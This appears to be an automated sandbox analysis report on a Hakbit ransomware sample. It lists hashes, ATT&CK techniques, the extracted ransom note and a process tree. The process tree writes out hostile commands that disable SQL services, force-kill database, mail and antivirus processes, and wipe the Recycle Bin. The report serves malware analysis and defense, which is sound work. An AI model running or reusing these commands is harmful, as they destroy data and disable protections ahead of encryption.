hakbit | 38bc13ef112b2f17d4d1a80243fac6a521b5d58228984aae0752d79487fa3b66

Resubmissions

01/04/2025, 21:24

250401-z8184awycs 10

Analysis

max time kernel
813s
max time network
828s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
26/02/2025, 05:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Size

80KB
MD5

8152a3d0d76f7e968597f4f834fdfa9d
SHA1

c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
SHA256

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
SHA512

eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4
SSDEEP

1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0

Score

10^/10

hakbit credential_access defense_evasion discovery execution ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below [email protected] Key Identifier: fxaLzTieFu0KmvWEBJBCOrmNr+VfeKXUJd7lcTHQdWh1iGMf2/mPGG04snW6G89XUm56JBtWp/+v2DQkIaePu07DaSCleh+zZZc56OzBapnB0R/jfQGQE73/187iZa5+1jwVxrFOqjBibiK2nxwXxwGtcjr6txHMR9TikpP0c2lOIwEOHQU7DBL6Xd1vIfcKoKdZxB4NvMJM9WgNwt2V5MBqBvxDmEVtj1Ei4QsSGoJTuC0TkmCzQpmblUX6QThzVdke6VGVgP29eQZlud4PjMc/pmfs0RWm2e4oc7YYReg2/M9ZQzdu9fXrSnFqkeVqLBZLqPLnY8IR3jN0/TDiDN10B1FhtUjeKvIwSDHipwz8+/8FaLadIOonHTfDanmbyFZZ8a9QE0M/iIlcGGaWM2PVFeDQe9y4jpk5qdNXXf32qqnV8oqTDETgqIZ+hibUw2WhFOWsnJP+SyF3EZIqlpbzlEWOn+SxXH6p8vwWmsPOAbrkZOOP/NXgQsIx4REz0a8/8/eUKZWijv7a2NM0NOM5bma59pTzlfpnDVTke9vqkAbiR5ipJvUyNQn3qxGY38pzza9JXYk5JapsdZfdFaXsy2LfxffbUoHIIkDyIIPA3uXsk7N+OL7V8AzQ8VJyuWNPX4StA3cuy1DY2lq6Uwqv1jZQZVBOqz8F9WW4zUY= Number of files that were processed is: 396

Emails

[email protected]

Signatures

Disables service(s) 3 TTPs
defense_evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit
Hakbit family
hakbit

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2568	sc.exe
4072	sc.exe
3140	sc.exe
2408	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5576	cmd.exe
3372	PING.EXE

Kills process with taskkill 47 IoCs

defense_evasion

pid	Process
1088	taskkill.exe
1284	taskkill.exe
3812	taskkill.exe
888	taskkill.exe
1680	taskkill.exe
1752	taskkill.exe
4256	taskkill.exe
3488	taskkill.exe
3452	taskkill.exe
1516	taskkill.exe
3556	taskkill.exe
3084	taskkill.exe
4300	taskkill.exe
3000	taskkill.exe
1524	taskkill.exe
3852	taskkill.exe
4260	taskkill.exe
2632	taskkill.exe
4792	taskkill.exe
3420	taskkill.exe
4224	taskkill.exe
3816	taskkill.exe
4604	taskkill.exe
4412	taskkill.exe
1372	taskkill.exe
1988	taskkill.exe
1572	taskkill.exe
4724	taskkill.exe
3636	taskkill.exe
4496	taskkill.exe
3592	taskkill.exe
896	taskkill.exe
2808	taskkill.exe
5016	taskkill.exe
4652	taskkill.exe
5084	taskkill.exe
2776	taskkill.exe
3652	taskkill.exe
4292	taskkill.exe
4628	taskkill.exe
4488	taskkill.exe
3408	taskkill.exe
1880	taskkill.exe
4892	taskkill.exe
3344	taskkill.exe
4872	taskkill.exe
336	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
7164	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3372	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	3000	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	3084	taskkill.exe
Token: SeDebugPrivilege	1284	taskkill.exe
Token: SeDebugPrivilege	4488	taskkill.exe
Token: SeDebugPrivilege	3592	taskkill.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	3852	taskkill.exe
Token: SeDebugPrivilege	888	taskkill.exe
Token: SeDebugPrivilege	4256	taskkill.exe
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	3488	taskkill.exe
Token: SeDebugPrivilege	3812	taskkill.exe
Token: SeDebugPrivilege	3344	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	896	taskkill.exe
Token: SeDebugPrivilege	4628	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	4892	taskkill.exe
Token: SeDebugPrivilege	4792	taskkill.exe
Token: SeDebugPrivilege	3636	taskkill.exe
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	3556	taskkill.exe
Token: SeDebugPrivilege	5016	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	5084	taskkill.exe
Token: SeDebugPrivilege	3652	taskkill.exe
Token: SeDebugPrivilege	4300	taskkill.exe
Token: SeDebugPrivilege	4724	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	4412	taskkill.exe
Token: SeDebugPrivilege	4872	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	2808	taskkill.exe
Token: SeDebugPrivilege	4224	taskkill.exe
Token: SeDebugPrivilege	3408	taskkill.exe
Token: SeDebugPrivilege	4604	taskkill.exe
Token: SeDebugPrivilege	4652	taskkill.exe
Token: SeDebugPrivilege	4496	taskkill.exe
Token: SeDebugPrivilege	1372	taskkill.exe
Token: SeDebugPrivilege	3420	taskkill.exe
Token: SeDebugPrivilege	4292	taskkill.exe
Token: SeDebugPrivilege	2632	taskkill.exe
Token: SeDebugPrivilege	336	taskkill.exe
Token: SeDebugPrivilege	3816	taskkill.exe
Token: SeDebugPrivilege	3372	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2132 wrote to memory of 2408	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	85
PID 2132 wrote to memory of 2408	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	85
PID 2132 wrote to memory of 3140	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	86
PID 2132 wrote to memory of 3140	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	86
PID 2132 wrote to memory of 4072	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	87
PID 2132 wrote to memory of 4072	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	87
PID 2132 wrote to memory of 2568	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	88
PID 2132 wrote to memory of 2568	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	88
PID 2132 wrote to memory of 4496	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	89
PID 2132 wrote to memory of 4496	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	89
PID 2132 wrote to memory of 3000	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	90
PID 2132 wrote to memory of 3000	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	90
PID 2132 wrote to memory of 4300	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	91
PID 2132 wrote to memory of 4300	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	91
PID 2132 wrote to memory of 3420	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	92
PID 2132 wrote to memory of 3420	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	92
PID 2132 wrote to memory of 1516	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	93
PID 2132 wrote to memory of 1516	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	93
PID 2132 wrote to memory of 3828	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	98
PID 2132 wrote to memory of 3828	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	98
PID 2132 wrote to memory of 5016	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	101
PID 2132 wrote to memory of 5016	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	101
PID 2132 wrote to memory of 4792	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	102
PID 2132 wrote to memory of 4792	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	102
PID 2132 wrote to memory of 3452	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	103
PID 2132 wrote to memory of 3452	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	103
PID 2132 wrote to memory of 4652	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	104
PID 2132 wrote to memory of 4652	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	104
PID 2132 wrote to memory of 3488	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	109
PID 2132 wrote to memory of 3488	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	109
PID 2132 wrote to memory of 2632	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	110
PID 2132 wrote to memory of 2632	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	110
PID 2132 wrote to memory of 3084	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	113
PID 2132 wrote to memory of 3084	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	113
PID 2132 wrote to memory of 4256	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	114
PID 2132 wrote to memory of 4256	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	114
PID 2132 wrote to memory of 1752	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	115
PID 2132 wrote to memory of 1752	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	115
PID 2132 wrote to memory of 1372	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	116
PID 2132 wrote to memory of 1372	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	116
PID 2132 wrote to memory of 3556	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	117
PID 2132 wrote to memory of 3556	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	117
PID 2132 wrote to memory of 4412	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	118
PID 2132 wrote to memory of 4412	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	118
PID 2132 wrote to memory of 2808	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	119
PID 2132 wrote to memory of 2808	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	119
PID 2132 wrote to memory of 1680	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	120
PID 2132 wrote to memory of 1680	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	120
PID 2132 wrote to memory of 4628	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	121
PID 2132 wrote to memory of 4628	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	121
PID 2132 wrote to memory of 4260	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	122
PID 2132 wrote to memory of 4260	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	122
PID 2132 wrote to memory of 4604	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	123
PID 2132 wrote to memory of 4604	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	123
PID 2132 wrote to memory of 888	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	124
PID 2132 wrote to memory of 888	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	124
PID 2132 wrote to memory of 1088	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	125
PID 2132 wrote to memory of 1088	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	125
PID 2132 wrote to memory of 3636	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	127
PID 2132 wrote to memory of 3636	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	127
PID 2132 wrote to memory of 4292	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	128
PID 2132 wrote to memory of 4292	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	128
PID 2132 wrote to memory of 4724	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	130
PID 2132 wrote to memory of 4724	2132	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	130

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2132
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:2408
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:3140
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:4072
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:2568
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4496
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4300
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3420
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:3828
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5016
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4792
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3452
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4652
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3488
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2632
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3084
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4256
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1372
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3556
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4412
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2808
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4628
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4260
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4604
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:888
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1088
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3636
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4292
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4724
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3852
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:336
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4872
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3812
